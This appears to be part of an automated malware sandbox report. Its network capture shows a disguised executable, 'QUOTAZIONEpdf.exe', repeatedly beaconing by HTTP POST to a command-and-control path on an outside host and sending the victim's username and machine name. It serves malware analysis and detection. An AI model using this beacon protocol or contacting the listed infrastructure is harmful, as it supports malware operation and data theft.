              Jan 14, 2022 09:52:54.669015884 CET1121OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:54.793697119 CET1121OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:54.926312923 CET1122INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:53 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              11192.168.2.349755104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:57.212577105 CET1145OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:57.335104942 CET1146OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:57.467825890 CET1146INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:56 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              12192.168.2.349756104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:59.611439943 CET1147OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:59.738571882 CET1147OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:59.868741035 CET1147INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:58 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              13192.168.2.349757104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:02.120827913 CET1148OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:02.245347023 CET1148OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:02.376370907 CET1149INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:01 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              14192.168.2.349758104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:03.980417013 CET1149OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:04.106193066 CET1150OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:04.236856937 CET1150INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:03 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              15192.168.2.349759104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:06.924773932 CET1151OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:07.074510098 CET1151OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:07.233124971 CET1151INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:06 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              16192.168.2.349760104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:08.606764078 CET1152OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:08.732410908 CET1153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:08.864233971 CET1153INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:07 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              17192.168.2.349761104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:10.307977915 CET1154OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:10.502069950 CET1154OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:10.631426096 CET1154INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:09 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              18192.168.2.349762104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:11.692209005 CET1155OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:11.815228939 CET1155OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:11.946695089 CET1156INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:10 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              19192.168.2.349763104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:13.390691996 CET1156OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:13.515346050 CET1157OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:13.657711029 CET1157INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:12 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.349744104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:41.740730047 CET1107OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:41.864794016 CET1108OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:41.998064995 CET1108INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:40 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              20192.168.2.349764104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:15.147551060 CET1158OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:15.271997929 CET1158OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:15.406161070 CET1158INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:14 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              21192.168.2.349765104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:16.674288988 CET1159OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:16.798804998 CET1159OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:16.934175968 CET1160INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:15 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              22192.168.2.349766104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:18.230034113 CET1161OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:18.352592945 CET1163OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:18.484214067 CET1163INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:17 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              23192.168.2.349770104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:19.843821049 CET1166OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:19.966540098 CET1167OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:20.097187996 CET1167INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:19 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              24192.168.2.349771104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:21.176589966 CET1168OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:21.303132057 CET1168OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:21.435849905 CET1168INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:20 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              25192.168.2.349772104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:22.793267965 CET1169OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:22.920172930 CET1170OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:23.150387049 CET1170INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:21 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              26192.168.2.349773104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:25.250387907 CET1171OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:25.374854088 CET1171OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:25.508188009 CET1171INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:24 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              27192.168.2.349775104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:26.628571033 CET1245OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:26.751445055 CET1251OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:26.881258965 CET1298INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:25 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              28192.168.2.349781104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:28.069977045 CET1431OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:28.194595098 CET1463OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:28.325772047 CET1465INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:27 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              29192.168.2.349789104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:29.435189962 CET1800OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:29.567574978 CET1910OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:29.699652910 CET1912INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:28 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.349745104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:43.225955009 CET1109OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:43.349733114 CET1109OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:43.481673956 CET1109INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:42 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
